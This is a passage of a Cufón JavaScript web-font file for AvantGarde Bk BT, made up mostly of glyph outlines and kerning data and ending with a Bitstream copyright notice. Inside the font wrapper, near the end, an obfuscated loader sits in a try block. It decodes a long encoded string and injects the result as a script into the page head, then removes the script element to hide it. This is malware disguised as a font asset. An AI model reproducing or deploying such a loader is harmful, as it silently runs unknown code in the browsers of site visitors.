2039":6,"\u2019":-13,"\u201d":-13,"\u00ab":6,".":6,",":6}},{"d":"99,-108r0,23r-82,0r0,-23r82,0","w":115,"k":{"\u00c5":6,"x":13,"w":13,"v":13,"t":6,"j":-7,"Y":20,"X":13,"W":20,"V":20,"T":20,"S":13,"J":20,"A":6}},{"d":"143,5v-116,8,-173,-149,-92,-229v36,-35,110,-50,159,-18v20,12,36,29,48,52r-30,0v-20,-27,-44,-46,-87,-46v-55,-1,-104,51,-104,107v0,59,46,111,104,110v41,-1,66,-17,85,-44r30,0v-20,39,-59,64,-113,68xm92,-343r17,0r32,46r32,-46r17,0r-36,61r-26,0","w":270},{"d":"136,-72r1,-154r-95,154r94,0xm160,0r-25,0r0,-49r-120,0r0,-23r116,-184r29,0r0,184r28,0r0,23r-28,0r0,49","w":203},{"d":"28,-259r209,0r0,328r-30,0r0,-302r-149,0r0,302r-30,0r0,-328","w":265},{"d":"98,-94r0,94r-25,0r0,-94r-82,-162r29,0r66,133r66,-133r28,0xm80,-281r-16,0r37,-62r26,0","w":172},{"d":"194,-31r-3,-225r25,0r0,256r-31,0r-140,-226r3,226r-25,0r0,-256r30,0xm103,-321v21,0,44,20,53,-4r15,0v-5,36,-42,34,-72,23v-8,1,-13,6,-16,13r-14,0v4,-18,14,-32,34,-32","w":240},{"d":"45,-216r-25,0r0,-40r25,0r0,40xm20,0r0,-193r25,0r0,193r-25,0","w":65,"k":{"\u2039":6,"\u2019":-13,"\u201d":-13,"\u00ab":6,".":6,",":6}},{"d":"137,0r-133,0r0,-23r100,-147r-89,0r0,-23r117,0r0,26r-99,142r104,0r0,25","w":145,"k":{"\u203a":6,"\u2039":26,"\u2019":-13,"\u2018":6,"\u201d":-13,"\u201c":6,"\u00bb":6,"\u00ab":26,";":6,":":6,".":13,"-":6,",":13}},{"d":"102,-173v-79,0,-54,99,-58,173r-24,0r0,-193r24,0r0,22v14,-17,32,-26,61,-26v55,0,76,31,76,96r0,101r-24,0v-5,-70,24,-173,-55,-173xm86,-259v21,0,44,20,53,-4r15,0v-5,36,-42,34,-72,23v-8,1,-13,6,-16,13r-14,0v4,-18,14,-32,34,-32","w":200},{"d":"24,0r0,-256r126,0r0,25r-101,0r0,90r101,0r0,25r-101,0r0,116r-25,0xm262,-169v-69,2,-35,106,-43,169r-25,0r0,-193r23,0r0,22v11,-15,22,-24,45,-25r0,27","w":264},{"d":"10,-96v0,-77,90,-133,156,-86v16,11,28,27,36,48r-27,0v-14,-25,-32,-41,-67,-41v-41,-1,-72,36,-72,78v0,42,31,80,73,79v33,-1,54,-18,66,-42r27,0v-14,39,-44,64,-92,65v-55,2,-100,-47,-100,-101xm131,50v1,-17,-14,-19,-33,-18r0,-32r11,0r0,20v25,-1,42,7,42,30v1,39,-54,33,-84,24r0,-14v23,4,62,16,64,-10","w":218},{"d":"64,-147r-25,0r0,-46r25,0r0,46xm64,0r-25,0r0,-47r25,0r0,47","w":103},{"d":"111,-199v60,0,100,48,99,110r-175,0v3,40,32,71,74,71v32,0,55,-20,66,-43r28,0v-15,38,-45,65,-93,66v-55,2,-101,-47,-101,-102v0,-57,44,-102,102,-102xm182,-110v-4,-58,-77,-85,-122,-48v-13,12,-21,28,-24,48r146,0xm105,-219r-16,0r37,-62r26,0","w":218},{"d":"41,-175v0,36,24,64,59,64v35,0,62,-28,62,-64v0,-35,-29,-64,-62,-64v-35,0,-60,28,-59,64xm102,-261v49,0,89,37,87,84v-3,58,-68,127,-95,177r-31,0r60,-93v-59,18,-108,-25,-108,-81v0,-50,37,-87,87,-87","w":203},{"d":"272,-125v0,43,-17,71,-41,94v10,8,25,11,44,10v-1,11,6,28,-13,23v-20,0,-38,-7,-51,-17v-85,56,-207,-15,-200,-115v5,-77,51,-128,130,-131v75,-3,133,60,131,136xm96,-110v59,2,77,26,115,64v20,-20,35,-47,35,-84v2,-56,-49,-108,-105,-107v-64,1,-121,66,-100,139v17,-7,33,-12,55,-12xm50,-75v20,44,86,73,141,44v-40,-43,-78,-69,-141,-44","w":283,"k":{"\u201e":-7,"\u201a":-7,"\u2019":-10,"\u2018":6,"\u201d":-10,"\u201c":6,".":6,",":6}},{"d":"144,-72v0,-48,-45,-51,-96,-49r0,97v50,2,96,0,96,-48xm130,-189v0,-40,-38,-44,-82,-43r0,87v47,0,82,-2,82,-44xm170,-76v3,77,-67,79,-146,76r0,-256v70,-3,132,0,132,68v0,26,-11,40,-28,50v26,11,41,29,42,62","w":183,"k":{"\u201e":6,"\u201a":6,"\u2018":13,"\u201c":13,";":13,":":13,".":13,",":13}},{"d":"253,-180r-179,73r179,72r0,20r-207,-85r0,-14r207,-86r0,20","w":299},{"d":"114,-274v-13,0,-25,12,-25,26v0,14,12,25,25,25v13,0,25,-11,25,-25v0,-14,-12,-26,-25,-26xm113,-208v-22,0,-40,-19,-40,-40v0,-21,18,-40,40,-40v22,0,41,18,41,40v0,21,-20,40,-41,40xm10,-96v0,-91,127,-138,173,-66r0,-31r24,0r0,193r-24,0r0,-31v-14,21,-41,36,-74,36v-55,0,-99,-45,-99,-101xm110,-18v40,0,73,-39,73,-80v0,-39,-35,-77,-72,-77v-41,0,-75,36,-75,80v0,42,34,77,74,77","w":226,"k":{"\u2039":6,"\u2019":-7,"\u2018":6,"\u201d":-7,"\u201c":6,"\u00ab":6,".":6,",":6}},{"d":"95,-237v-32,0,-42,12,-41,44r41,0r0,21r-41,0r0,172r-24,0r0,-172r-26,0r0,-21r25,0v-1,-46,20,-67,66,-66r0,22","w":98,"k":{"\u203a":13,"\u2039":20,"\u2019":-27,"\u2018":-13,"\u201d":-27,"\u201c":-13,"\u00bb":13,"\u00ab":20,".":26,"-":6,",":26}},{"d":"45,0r-25,0r0,-256r25,0r0,152r70,-89r28,0r-70,89r85,104r-31,0r-82,-101r0,101","w":149,"k":{"\u203a":6,"\u2039":20,"\u2019":-13,"\u2018":6,"\u201d":-13,"\u201c":6,"\u0153":6,"\u00bb":6,"\u00ab":20,"\u00f8":6,"\u00e6":6,"o":6,"e":6,"a":6,".":6,"-":13,",":6}},{"d":"82,-133v29,1,55,-27,55,-56v0,-27,-26,-54,-54,-54v-30,0,-56,25,-56,56v0,30,26,54,55,54xm8,-188v-6,-64,95,-96,129,-46r0,-22r19,0r0,135r-19,0r0,-21v-35,49,-136,20,-129,-46","w":170},{"d":"254,-147v49,-2,61,59,24,89r-54,44r79,0r0,14r-100,0r0,-14v27,-29,75,-46,85,-88v0,-18,-17,-32,-35,-32v-22,1,-36,16,-35,39r-15,0v-2,-32,22,-51,51,-52xm89,5r-21,0r159,-266r21,0xm75,-113r-17,0r0,-131r-28,0r0,-12r45,0r0,143","w":316},{"d":"189,-85v0,73,-94,121,-147,67v-16,-16,-25,-36,-27,-60r25,0v1,31,29,60,62,60v35,0,61,-31,61,-67v0,-67,-91,-86,-117,-35r-19,-9r22,-127r116,0r0,25r-94,0r-13,72v53,-42,131,5,131,74","w":203},{"d":"249,-110v0,-37,-40,-63,-65,-33v-8,9,-17,24,-26,45v13,46,91,47,91,-12xm51,-105v0,37,42,63,66,32v8,-9,17,-23,26,-44v-11,-20,-24,-34,-50,-35v-25,-1,-42,22,-42,47xm92,-174v31,0,43,21,55,47v14,-28,26,-45,58,-47v31,-1,54,32,54,66v0,36,-19,66,-51,66v-31,0,-41,-19,-55,-46v-14,26,-26,46,-57,46v-31,0,-55,-31,-55,-66v0,-36,19,-66,51,-66","w":299},{"d":"20,0r0,-193r25,0r0,193r-25,0","w":65},{"d":"83,-152v-1,-64,-6,-118,67,-108r0,19v-90,-19,-7,137,-80,148v41,6,34,55,34,103v0,37,9,45,46,44r0,19v-71,9,-69,-42,-67,-108v1,-38,-15,-50,-52,-49r0,-19v37,1,53,-10,52,-49"},{"d":"147,-117v47,20,88,15,122,-15r0,20v-20,14,-39,24,-68,25v-26,1,-78,-26,-102,-24v-28,3,-45,13,-68,28r0,-20v34,-24,69,-34,116,-14","w":299},{"d":"18,0r-27,0r99,-256r31,0r99,256r-27,0r-31,-80r-114,0xm153,-103r-48,-129r-48,129r96,0","w":214,"k":{"\u201e":-27,"\u201a":-27,"\u2039":13,"\u2019":28,"\u2018":53,"\u201d":28,"\u201c":53,"\u00ab":13,"y":6,"w":10,"v":11,"Y":13,"V":10,"T":13,"S":-10,";":6,":":6,".":6,"-":6,",":6}},{"d":"255,-151r0,88r-17,0r0,-70r-193,0r0,-18r210,0","w":299},{"d":"30,0r-31,0r89,-129r-87,-127r31,0r71,106r70,-106r31,0r-87,127r89,129r-32,0r-71,-109","w":204,"k":{"\u201e":-17,"\u201a":-17,"\u203a":13,"\u2039":33,"\u2019":-7,"\u2018":-7,"\u201d":-7,"\u201c":-7,"\u0152":10,"\u00bb":13,"\u00ab":33,"\u00d8":10,"e":6,"O":10,"C":10,";":6,":":6,".":6,"-":13,",":6}},{"d":"12,-127v0,-52,36,-95,82,-101r0,-37r24,0r0,36v43,4,68,32,79,69r-26,0v-9,-29,-29,-46,-64,-47v-40,0,-69,37,-69,80v0,44,30,80,71,80v32,-1,55,-23,62,-50r26,0v-13,39,-36,66,-79,71r0,40r-24,0r0,-40v-45,-5,-82,-51,-82,-101","w":203},{"d":"110,-18v40,0,73,-39,73,-80v0,-39,-35,-77,-72,-77v-41,0,-75,36,-75,80v0,42,34,77,74,77xm10,-96v0,-91,127,-138,173,-66r0,-31r24,0r0,193r-24,0r0,-31v-14,21,-41,36,-74,36v-55,0,-99,-45,-99,-101xm118,-219r-47,-62r26,0r37,62r-16,0","w":226},{"d":"18,0r-27,0r99,-256r31,0r99,256r-27,0r-31,-80r-114,0xm153,-103r-48,-129r-48,129r96,0xm125,-293r0,-29r25,0r0,29r-25,0xm60,-293r0,-29r25,0r0,29r-25,0","w":214},{"d":"20,0r0,-193r25,0r0,193r-25,0xm53,-231r0,-29r25,0r0,29r-25,0xm-12,-231r0,-29r25,0r0,29r-25,0","w":65},{"d":"209,-98v0,76,-94,134,-157,85r-32,37r-15,-14r31,-37v-58,-56,-13,-172,73,-172v24,0,42,7,56,18r30,-36r16,13r-30,36v16,16,28,40,28,70xm67,-32v65,51,156,-45,99,-117xm150,-163v-65,-48,-155,46,-98,117","w":218,"k":{"\u203a":6,"\u2018":26,"\u201c":26,"\u00bb":6,";":6,":":6,".":13,",":13}},{"d":"177,-74v0,41,-26,70,-63,73r0,44r-25,0r0,-44v-38,-3,-62,-34,-62,-75r24,0v0,34,16,53,50,53v31,1,50,-18,51,-47v3,-59,-119,-43,-119,-118v0,-34,26,-62,56,-66r0,-37r25,0r0,37v34,4,56,27,57,64r-25,0v0,-25,-18,-43,-43,-43v-27,-1,-45,18,-45,44v2,55,119,40,119,115","w":203},{"d":"107,-176v-40,0,-72,38,-72,79v0,42,33,79,75,79v42,0,73,-37,73,-79v0,-44,-32,-79,-76,-79xm110,5v-55,0,-101,-47,-101,-102v0,-54,46,-103,99,-103v54,0,101,48,101,101v0,56,-44,104,-99,104xm117,-219r-47,-62r26,0r37,62r-16,0","w":218},{"d":"180,67r0,18r-180,0r0,-18r180,0"},{"d":"106,-332v-13,0,-25,12,-25,26v0,13,12,24,25,24v13,0,26,-11,25,-24v0,-13,-12,-26,-25,-26xm105,-266v-21,0,-40,-19,-40,-40v0,-21,19,-41,40,-41v22,0,41,19,41,41v0,21,-20,40,-41,40xm153,-103r-48,-129r-48,129r96,0xm18,0r-27,0r99,-256r31,0r99,256r-27,0r-31,-80r-114,0","w":214,"k":{"\u201e":-27,"\u201a":-27,"\u2039":13,"\u2019":28,"\u2018":53,"\u201d":28,"\u201c":53,"\u00ab":13,"y":6,"w":10,"v":11,"Y":13,"V":10,"T":13,"S":-10,";":6,":":6,".":6,"-":6,",":6}},{"d":"284,-199v60,-1,100,48,98,111r-173,0v-2,75,117,94,139,28r28,0v-16,38,-45,65,-94,65v-44,0,-68,-22,-86,-52v-17,30,-43,51,-86,52v-56,2,-101,-47,-101,-102v0,-55,47,-103,101,-102v40,1,71,22,86,52v17,-30,46,-51,88,-52xm356,-110v-5,-57,-78,-87,-122,-47v-14,12,-22,27,-24,47r146,0xm107,-176v-40,0,-72,38,-72,79v0,42,33,79,75,79v42,0,73,-37,73,-79v0,-44,-32,-79,-76,-79","w":391,"k":{"\u203a":6,"\u2018":26,"\u201c":26,"\u00bb":6,";":6,":":6,".":13,",":13}},{"d":"76,41r0,-74r-64,0r0,-22r64,0r0,-105r-64,0r0,-22r64,0r0,-74r26,0r0,74r66,0r0,22r-66,0r0,105r66,0r0,22r-66,0r0,74r-26,0"},{"d":"83,-252r0,97r-18,0r0,-97r18,0xm35,-252r0,97r-18,0r0,-97r18,0","w":100},{"d":"51,-112v-9,0,-16,-7,-16,-16v0,-10,7,-17,16,-17v21,0,20,33,0,33","w":101},{"d":"110,-18v40,0,73,-39,73,-80v0,-39,-35,-77,-72,-77v-41,0,-75,36,-75,80v0,42,34,77,74,77xm10,-96v0,-91,127,-138,173,-66r0,-31r24,0r0,193r-24,0r0,-31v-14,21,-41,36,-74,36v-55,0,-99,-45,-99,-101xm95,-259v21,0,44,20,53,-4r15,0v-5,36,-42,34,-72,23v-8,1,-13,6,-16,13r-14,0v4,-18,14,-32,34,-32","w":226},{"d":"107,-176v-40,0,-72,38,-72,79v0,42,33,79,75,79v42,0,73,-37,73,-79v0,-44,-32,-79,-76,-79xm110,5v-55,0,-101,-47,-101,-102v0,-54,46,-103,99,-103v54,0,101,48,101,101v0,56,-44,104,-99,104xm94,-259v21,0,44,20,53,-4r15,0v-5,36,-42,34,-72,23v-8,1,-13,6,-16,13r-14,0v4,-18,14,-32,34,-32","w":218},{"d":"20,0r0,-193r25,0r0,193r-25,0xm39,-219r-47,-62r26,0r37,62r-16,0","w":65},{"d":"82,-128v0,-62,61,-100,109,-66v11,8,17,19,18,33r-20,0v-4,-17,-18,-30,-39,-29v-32,0,-45,28,-45,63v0,34,13,62,45,62v23,0,38,-14,41,-33r20,0v-2,30,-29,51,-62,51v-44,0,-67,-34,-67,-81xm150,-13v69,0,115,-46,115,-114v0,-68,-46,-115,-115,-115v-68,0,-115,47,-115,115v0,67,46,114,115,114xm21,-127v0,-76,52,-129,129,-129v77,0,129,52,129,129v0,77,-53,129,-129,129v-77,0,-129,-53,-129,-129","w":299},{"d":"20,0r0,-193r25,0r0,193r-25,0xm-16,-219r36,-62r26,0r36,62r-17,0r-32,-47r-32,47r-17,0","w":65},{"d":"253,-24r0,17r-207,0r0,-17r207,0xm253,-189r-177,59r177,60r0,18r-207,-70r0,-15r207,-71r0,19","w":299},{"d":"37,0r0,-168r-37,0r0,-25r37,0r0,-63r25,0r0,63r36,0r0,25r-36,0r0,168r-25,0","w":98,"k":{"\u203a":10,"\u2039":13,"\u2019":-20,"\u2018":-7,"\u201d":-20,"\u201c":-7,"\u00bb":10,"\u00ab":13,".":20,"-":6,",":20}},{"d":"110,-18v40,0,73,-39,73,-80v0,-39,-35,-77,-72,-77v-41,0,-75,36,-75,80v0,42,34,77,74,77xm10,-96v0,-91,127,-138,173,-66r0,-31r24,0r0,193r-24,0r0,-31v-14,21,-41,36,-74,36v-55,0,-99,-45,-99,-101xm106,-219r-16,0r37,-62r26,0","w":226},{"d":"98,5v-98,6,-77,-107,-79,-198r25,0v5,71,-24,175,55,175v77,0,55,-99,58,-175r24,0r0,193r-24,0r0,-21v-15,17,-30,24,-59,26xm50,-219r36,-62r26,0r36,62r-17,0r-32,-47r-32,47r-17,0","w":200},{"d":"107,-176v-40,0,-72,38,-72,79v0,42,33,79,75,79v42,0,73,-37,73,-79v0,-44,-32,-79,-76,-79xm110,5v-55,0,-101,-47,-101,-102v0,-54,46,-103,99,-103v54,0,101,48,101,101v0,56,-44,104,-99,104xm131,-231r0,-29r25,0r0,29r-25,0xm66,-231r0,-29r25,0r0,29r-25,0","w":218},{"d":"111,5v-57,0,-89,-34,-87,-99r-25,0r5,-19r20,0r0,-30r-24,0r5,-19r19,0v-12,-91,90,-125,147,-77v17,14,25,32,26,50r-26,0v-5,-30,-27,-50,-60,-50v-42,0,-65,31,-62,77r113,0r-5,19r-108,0r0,30r104,0r-4,19r-100,0v-3,46,20,77,62,77v34,0,53,-18,59,-47r26,0v-6,44,-39,69,-85,69","w":203},{"d":"98,5v-98,6,-77,-107,-79,-198r25,0v5,71,-24,175,55,175v77,0,55,-99,58,-175r24,0r0,193r-24,0r0,-21v-15,17,-30,24,-59,26xm105,-219r-47,-62r26,0r37,62r-16,0","w":200},{"d":"110,-18v40,0,73,-39,73,-80v0,-39,-35,-77,-72,-77v-41,0,-75,36,-75,80v0,42,34,77,74,77xm10,-96v0,-91,127,-138,173,-66r0,-31r24,0r0,193r-24,0r0,-31v-14,21,-41,36,-74,36v-55,0,-99,-45,-99,-101","w":226,"k":{"\u2039":6,"\u2019":-7,"\u2018":6,"\u201d":-7,"\u201c":6,"\u00ab":6,".":6,",":6}},{"d":"18,0r-27,0r99,-256r31,0r99,256r-27,0r-31,-80r-114,0xm153,-103r-48,-129r-48,129r96,0xm111,-281r-47,-62r26,0r37,62r-16,0","w":214},{"d":"118,0r0,-193r25,0r0,193r-25,0xm94,-237v-31,0,-41,12,-40,44r40,0r0,21r-40,0r0,172r-24,0r0,-172r-26,0r0,-21r25,0v-1,-46,20,-66,65,-66r0,22xm143,-216r-25,0r0,-40r25,0r0,40","w":167,"k":{"\u2039":6,"\u2019":-13,"\u201d":-13,"\u00ab":6,".":6,",":6}},{"d":"118,0r0,-256r25,0r0,256r-25,0xm94,-237v-31,0,-41,12,-40,44r40,0r0,21r-40,0r0,172r-24,0r0,-172r-26,0r0,-21r25,0v-1,-46,20,-66,65,-66r0,22","w":167,"k":{"\u2039":6,"\u2019":-13,"\u201d":-13,"\u00ab":6,".":6,",":6}},{"d":"45,-216r-25,0r0,-40r25,0r0,40xm-4,39v24,-1,24,-7,24,-35r0,-197r25,0r0,194v0,43,-8,62,-49,61r0,-23","w":65,"k":{"\u2039":6,"\u2019":-13,"\u201d":-13,"\u00ab":6,".":6,",":6}},{"d":"95,-106v59,19,37,111,-26,111v-37,0,-61,-28,-61,-66v8,1,19,-2,25,1v-6,47,70,57,70,10v0,-54,-95,-33,-87,-94v-3,-46,63,-72,95,-40v10,9,15,22,16,39r-26,0v-2,-18,-12,-28,-31,-29v-29,-1,-37,42,-13,54v9,5,26,10,38,14","w":140,"k":{"\u2019":-7,"\u2018":20,"\u201d":-7,"\u201c":20,".":13,",":13}},{"d":"102,-173v-79,0,-54,99,-58,173r-24,0r0,-193r24,0r0,22v14,-17,32,-26,61,-26v55,0,76,31,76,96r0,101r-24,0v-5,-70,24,-173,-55,-173","w":200,"k":{"\u2039":6,"\u2018":20,"\u201c":20,"\u00ab":6,".":6,",":6}},{"d":"15,-199v-1,-68,80,-63,150,-61r0,12r-22,0r0,248r-15,0r0,-248r-32,0r0,248r-15,0r0,-137v-38,-1,-66,-24,-66,-62"},{"d":"144,-181v0,-51,-46,-52,-98,-50r0,98v51,2,98,1,98,-48xm171,-182v-2,64,-52,80,-125,74r0,108r-25,0r0,-256v79,-3,151,0,150,74","w":181,"k":{"\u201e":53,"\u201a":53,"\u203a":20,"\u2039":26,"\u2019":-10,"\u201d":-10,"\u0153":16,"\u00bb":20,"\u00ab":26,"\u00f8":16,"\u00e6":16,"\u00c5":23,"u":6,"s":10,"r":6,"o":16,"n":6,"i":6,"e":16,"a":16,"A":23,";":13,":":13,".":79,"-":26,",":79}},{"d":"98,5v-98,6,-77,-107,-79,-198r25,0v5,71,-24,175,55,175v77,0,55,-99,58,-175r24,0r0,193r-24,0r0,-21v-15,17,-30,24,-59,26xm93,-219r-16,0r37,-62r26,0","w":200},{"d":"49,-141r108,0r0,25r-108,0r0,91r108,0r0,25r-133,0r0,-256r133,0r0,25r-108,0r0,90xm87,-281r-16,0r37,-62r26,0"},{"d":"115,5v-33,0,-54,-15,-71,-34r0,29r-25,0r0,-256r25,0r0,95v18,-23,40,-36,76,-37v53,-1,97,47,97,101v0,56,-44,102,-102,102xm117,-175v-40,0,-73,38,-73,80v0,40,35,78,72,77v41,0,75,-36,75,-80v0,-40,-35,-78,-74,-77","w":226,"k":{"\u203a":6,"\u2018":26,"\u201c":26,"\u00bb":6,";":6,":":6,".":13,",":13}},{"d":"107,-176v-40,0,-72,38,-72,79v0,42,33,79,75,79v42,0,73,-37,73,-79v0,-44,-32,-79,-76,-79xm110,5v-55,0,-101,-47,-101,-102v0,-54,46,-103,99,-103v54,0,101,48,101,101v0,56,-44,104,-99,104xm105,-219r-16,0r37,-62r26,0","w":218},{"d":"139,0r-115,0r0,-256r25,0r0,231r90,0r0,25","w":148,"k":{"\u201e":-7,"\u201a":-7,"\u203a":20,"\u2039":33,"\u2019":40,"\u2018":40,"\u201d":40,"\u201c":40,"\u0153":11,"\u0152":13,"\u00bb":20,"\u00ab":33,"\u00f8":11,"\u00e6":11,"\u00d8":13,"y":20,"u":11,"o":11,"e":11,"a":11,"Y":20,"W":21,"V":33,"U":6,"T":15,"O":13,";":6,":":6,".":13,"-":26,",":13}},{"w":101},{"d":"111,-199v60,0,100,48,99,110r-175,0v3,40,32,71,74,71v32,0,55,-20,66,-43r28,0v-15,38,-45,65,-93,66v-55,2,-101,-47,-101,-102v0,-57,44,-102,102,-102xm182,-110v-4,-58,-77,-85,-122,-48v-13,12,-21,28,-24,48r146,0xm117,-219r-47,-62r26,0r37,62r-16,0","w":218},{"d":"117,-40r-44,-57r44,-56r24,0r-43,56r43,57r-24,0xm63,-40r-43,-57r43,-56r25,0r-44,56r44,57r-25,0","w":164,"k":{"\u0111":6,"\uf002":6,"\uf001":6,"\u0153":6,"\u00f8":6,"\u00e6":6,"x":13,"w":13,"v":13,"t":10,"o":6,"j":-7,"g":6,"f":6,"e":6,"d":6,"c":6,"a":6,"Z":6,"Y":26,"X":13,"W":20,"V":26,"U":10,"T":20,"J":6}},{"d":"30,-193r45,73r48,-73r29,0r-63,92r63,101r-29,0r-49,-81r-52,81r-27,0r65,-100r-58,-93r28,0","w":149,"k":{"\u203a":13,"\u2039":20,"\u2019":-20,"\u201d":-20,"\u00bb":13,"\u00ab":20,";":6,":":6,".":6,"-":13,",":6}},{"d":"110,-18v40,0,73,-39,73,-80v0,-39,-35,-77,-72,-77v-41,0,-75,36,-75,80v0,42,34,77,74,77xm10,-96v0,-91,127,-138,173,-66r0,-31r24,0r0,193r-24,0r0,-31v-14,21,-41,36,-74,36v-55,0,-99,-45,-99,-101xm132,-231r0,-29r25,0r0,29r-25,0xm67,-231r0,-29r25,0r0,29r-25,0","w":226},{"d":"98,5v-98,6,-77,-107,-79,-198r25,0v5,71,-24,175,55,175v77,0,55,-99,58,-175r24,0r0,193r-24,0r0,-21v-15,17,-30,24,-59,26","w":200,"k":{"\u2039":6,"\u2019":-13,"\u2018":13,"\u201d":-13,"\u201c":13,"\u00ab":6,".":6,",":6}},{"d":"95,0r-22,0r-76,-193r26,0r62,156r63,-156r27,0","w":171,"k":{"\u203a":13,"\u2039":20,"\u2019":-20,"\u201d":-20,"\u00bb":13,"\u00ab":20,";":6,":":6,".":40,"-":13,",":40}},{"d":"206,-32v18,114,-151,147,-182,48r29,0v7,22,28,35,56,36v47,0,75,-36,73,-86v-44,74,-173,29,-173,-63v0,-55,44,-102,99,-101v36,0,58,14,74,36r0,-31r24,0r0,161xm109,-175v-41,0,-73,35,-73,77v0,43,31,79,73,79v37,0,73,-37,73,-76v0,-41,-32,-80,-73,-80xm161,-273v5,46,-55,57,-83,35v-8,-7,-12,-19,-13,-35r14,0v1,19,14,25,34,25v22,0,32,-6,34,-25r14,0","w":225},{"d":"44,-171v24,-39,110,-31,128,8v13,-20,36,-34,68,-34v93,0,73,108,75,197r-23,0v-5,-70,23,-173,-54,-173v-78,0,-54,98,-58,173r-23,0v-5,-71,23,-173,-55,-173v-79,0,-54,99,-58,173r-24,0r0,-193r24,0r0,22","w":335,"k":{"\u2039":6,"\u2018":20,"\u201c":20,"\u00ab":6,".":6,",":6}},{"d":"92,-193v48,16,29,94,-25,94v-33,0,-55,-18,-54,-50v5,1,14,-2,17,1v-1,20,16,36,36,36v22,0,38,-16,38,-36v-1,-28,-22,-37,-53,-36v1,-6,-4,-15,7,-12v41,7,44,-50,9,-50v-16,-1,-28,10,-27,26r-16,0v2,-23,18,-37,43,-39v37,-3,58,50,25,66","w":134},{"d":"131,-45v0,-9,9,-20,19,-19v10,-1,19,10,19,19v0,9,-9,19,-19,18v-10,1,-19,-9,-19,-18xm255,-116r0,17r-210,0r0,-17r210,0xm131,-169v0,-9,9,-20,19,-19v10,-1,19,10,19,19v0,9,-10,19,-19,19v-9,0,-19,-10,-19,-19","w":299},{"d":"49,0r-26,0r0,-256r26,0r0,256xm30,-281r-16,0r37,-62r26,0","w":72}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+-857-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("By`UDk.R*nA]B=$WIkXxuyuA8E.U`kA]8Ejx*noV`QS9>NRd8&2z|y|N8&2z|yjd|XCU|@LC`XCU|Gtl:t)98&2x|@>U8&2x|G.)8&2z|y|C8&2x|@Mi8&2z|k|lIUCU|@LN|XCU|@LC>UCU|Gs;:QCU|Gs@.$CU|@LC`QCU|Gj;:XjS8&2z|Etv8&2x|GX)BQCU|@Lx.$CU|@uz.$CU|@LN:QCU|Gsd.QCU|@uC.QCU|GtC`QCU|Gsk`O.pI_Lz>@)pI_LC:_jpIn>z|GspI_Lx`y.pI_ux|ntC8&2z|_|z8&2x|@>z8&2z|yuv8&2x|@tC8&2z|y|x8&2z|y.)oQCU|Gs;|&XpI_LC.n`pI_uC|@jpI_Lz>nopI_Lz>@MW8&2x|Ls=GtXy&ujB}|.:YMoO_2Qn8>`*DpIKmT)d@;$kV(,P-9^]!zCxNRUElivbWSA{~@Lx8&2x|@jd8&2x|Gux8&2z|yuC8&2z|yQ)8&2z|yj)8&2z|kMv8&2z|_>C8&2z|y2E8&2z|yok8&2z|y>RQ@IpI_Lz>nQpI_Lz`nopI_Lz>_XpI_Lz>_spI_Lz`y.pI_Lz`koT|;ApI_LC.@L9_$CU|Gs;.NvpI_uz|@LE2UCU|Gtz.xXpI_Lz`yQpI_Lz>_`pI_ux|_jGBkIpI_Lz>E.pI_Lz`GjpI_Lz`_j$8&2z|E|z8&2z|y`k8&2z|y`@nUCU|Gtz.$CU|Gs;.QCU|Gs)`$CU|@LC.XCU|@uC:QCU|Gj@.VspI_LC.nQpI_Lz>_)pI_LC.EQpI_Lx`yopI_uz|_$88&2x|yX@8&2x|Gti8&2z|y.$8&2z|ko)8&2z|yQdMXCU|Gs).NUpI_Lz>@jpI_Lz>k`pI_LC.GjpI_LC.GtN8&2z|_I;8&2z|_2x8&2z|yod8&2z|y>zot,pI_Lz>@s*8&2x|GtN8&2z|yo)8XCjQ2I2DlUpI_uU>EXpI_Lx`yjpI_LC|_X.n8jpI_Lz>k|kodIpI_Lz>_.pI_Lz`G.K8&2z|yMROl$pI_Lz>N)I8&2z|yj$}$CU|Gs;.$CU|Gs;:Xz!>x^(8&2z|y|l8&2z|_s;8&2z|y.d8&2z|y.k:=)pI_Lz>_2$YEM^8&2z|_s@.XCU|@uz`$CU|Gs;`XCU|Gs;|n$b8&2z|y>C8&2x|ytN8&2z|y2l:$CU|Gs$:_$oM@CpI_Lz`_Qk*UCU|Gs)>QCU|Gsd`GQpI_ux|nQpI_LC|NXWm;XpI_Lz>n.>8&2z|ytx8&2z|y2z8&2z|y|R8&2z|yQk8&2z|y>ijXCU|Gsk|$ApI_Lz>NQpI_LC._.pI_uz|@Xpu$CU|Gsd.UCU|Gs$|UCU|Gsk.QCU|Gs$>UCU|Gs):QCU|Gs$`QCU|@uE.&opI_Lz`_XpI_Lz`kjpI_Lz`@`pI_Lz>_opI_Lz`@$)8&2z|y|z8&Qk|GLC8&Qk|GLx*V.]8&2z|yuE2XCU|Gsk>QCU|Gs@:njpI_Lz`@.|uXCU|Gs$:XCU|Gs)>V)pI_Lz`_oUI$CU|GtC`kUpI_Lz>@.pI_Lz`@IpI_Lz>EMd}V.zDy$RB=udBOC,Y_L9pGUd}VL9DGUz}kC$DkIR*=CVYnu]`dvVD&$z*&|AKlRW*n>(>dv!*NR!8dT~:VIlIUz]B_S(YN(x|Gtz8=vN`8jRDE.!DQz]>EA^m&.$pVo!>EA^8=v@DER,j=A,}Vo$plM(DyA@>8o,DEi]*yANIyv)Dn2,Bn`!pdTW*_C9:x9-*O$VnE.D*QUIY8sD*QUABOT,")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":180,"face":{"font-family":"AvantGarde Bk BT","font-weight":400,"font-stretch":"normal","units-per-em":"360","panose-1":"2 11 4 2 2 2 2 2 2 4","ascent":"274","descent":"-86","x-height":"5","bbox":"-60 -347 458 85","underline-thickness":"19.8633","underline-position":"-21.4453","unicode-range":"U+0020-U+F002"}}));
/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * Copyright 1990-1998 Bitstream Inc.  All rights reserved.
 */
